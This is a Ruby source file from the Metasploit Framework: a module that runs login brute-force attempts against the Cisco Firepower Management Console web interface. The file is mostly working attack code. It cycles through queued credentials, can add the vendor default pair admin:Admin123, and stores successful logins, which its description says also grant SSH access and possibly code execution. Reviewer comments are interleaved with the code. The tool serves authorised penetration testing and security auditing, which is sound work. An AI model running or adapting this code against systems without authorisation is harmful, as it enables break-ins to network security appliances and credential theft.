
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_firepower_login.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'metasploit/framework/login_scanner/cisco_firepower'
require 'metasploit/framework/credential_collection'
# Auxiliary login scanner for the Cisco Firepower Management console web UI.
#
# For each target host the module first asks the login scanner whether the
# service looks like a Firepower Management console (+check_setup+), then
# submits every queued credential pair and reports each result through the
# framework's credential-reporting helpers.
#
# Per the module description, console credentials are also accepted over SSH,
# so a valid login recorded here affects both services on the appliance.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Declares the module metadata, its HTTPS defaults and its two options.
  #
  # @param info [Hash] metadata supplied by the framework and merged via
  #   +update_info+
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Cisco Firepower Management Console 6.0 Login',
        'Description' => %q{
          This module attempts to authenticate to a Cisco Firepower Management console via HTTPS.
          The credentials are also used for SSH, which could allow remote code execution.
        },
        'Author' => ['sinn3r'],
        'License' => MSF_LICENSE,
        # The console is reached over TLS on 443 unless the operator overrides it.
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true,
          'SSLVersion' => 'Auto'
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
        # Off by default: the default pair is only queued when explicitly requested.
        OptBool.new('TRYDEFAULT', [false, 'Try the default credential admin:Admin123', false])
      ]
    )
  end

  # Builds the Cisco Firepower login scanner on first use and caches it in
  # +@scanner+ for later calls.
  #
  # NOTE(review): the cached object is returned regardless of the +ip+ passed
  # on later calls, so this relies on one module instance per host — confirm
  # against the Scanner mixin.
  #
  # @param ip [String] address of the host to test
  # @return [Metasploit::Framework::LoginScanner::CiscoFirepower]
  def scanner(ip)
    @scanner ||= begin
      queue = build_credential_collection(
        username: datastore['USERNAME'],
        password: datastore['PASSWORD']
      )

      if datastore['TRYDEFAULT']
        # admin:Admin123 is the default pair named in the option text; a
        # successful login with it means the default password is still in place.
        print_status('Default credential admin:Admin123 added to the credential queue for testing.')
        queue.add_public('admin')
        queue.add_private('Admin123')
      end

      Metasploit::Framework::LoginScanner::CiscoFirepower.new(
        configure_http_login_scanner(
          host: ip,
          port: datastore['RPORT'],
          cred_details: queue,
          stop_on_success: datastore['STOP_ON_SUCCESS'],
          bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
          connection_timeout: 5, # fixed value, not exposed as an option
          http_username: datastore['HttpUsername'],
          http_password: datastore['HttpPassword'],
          uri: target_uri.path
        )
      )
    end
  end

  # Records a working credential together with the service it was found on.
  #
  # NOTE(review): the service is recorded as 'http' although DefaultOptions
  # enables SSL — confirm whether 'https' is intended.
  #
  # @param ip [String] address of the host that accepted the login
  # @param port [Integer] port of the service that accepted the login
  # @param result [Object] login result exposing +credential+, +status+ and +proof+
  # @return [Object] whatever +create_credential_login+ returns
  def report_good_cred(ip, port, result)
    endpoint = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    # The credential itself is created first; the login record then links it
    # to the endpoint with the scanner's status and proof.
    core = create_credential(
      {
        module_fullname: fullname,
        origin_type: :service,
        private_data: result.credential.private,
        private_type: :password,
        username: result.credential.public
      }.merge(endpoint)
    )

    login = {
      core: core,
      last_attempted_at: DateTime.now,
      status: result.status,
      proof: result.proof
    }.merge(endpoint)

    create_credential_login(login)
  end

  # Passes a failed attempt to +invalidate_login+ along with the scanner's
  # status and proof.
  #
  # @param ip [String] address of the host that was tested
  # @param rport [Integer] port of the service that was tested
  # @param result [Object] login result exposing +credential+, +status+ and +proof+
  # @return [Object] whatever +invalidate_login+ returns
  def report_bad_cred(ip, rport, result)
    attempted = result.credential

    invalidate_login(
      address: ip,
      port: rport,
      protocol: 'tcp',
      public: attempted.public,
      private: attempted.private,
      realm_key: attempted.realm_key,
      realm_value: attempted.realm,
      status: result.status,
      proof: result.proof
    )
  end

  # Runs every queued credential against one host and reports each result.
  #
  # Only SUCCESSFUL, UNABLE_TO_CONNECT and INCORRECT are handled; any other
  # status falls through the +case+ with no output and no report.
  #
  # @param ip [String] address of the host to test
  def bruteforce(ip)
    scanner(ip).scan! do |attempt|
      case attempt.status
      when Metasploit::Model::Login::Status::SUCCESSFUL
        print_brute(level: :good, ip: ip, msg: "Success: '#{attempt.credential}'")
        report_good_cred(ip, rport, attempt)
      when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
        # Connection failures are shown only in verbose mode, with the
        # scanner's proof as the message.
        vprint_brute(level: :verror, ip: ip, msg: attempt.proof)
        report_bad_cred(ip, rport, attempt)
      when Metasploit::Model::Login::Status::INCORRECT
        vprint_brute(level: :verror, ip: ip, msg: "Failed: '#{attempt.credential}'")
        report_bad_cred(ip, rport, attempt)
      end
    end
  end

  # Per-host entry point: skips hosts that fail the scanner's setup check and
  # runs the credential test against the rest.
  #
  # @param ip [String] address of the host to test
  def run_host(ip)
    if scanner(ip).check_setup
      bruteforce(ip)
    else
      print_brute(level: :error, ip: ip, msg: 'Target is not Cisco Firepower Management console.')
      nil
    end
  end
end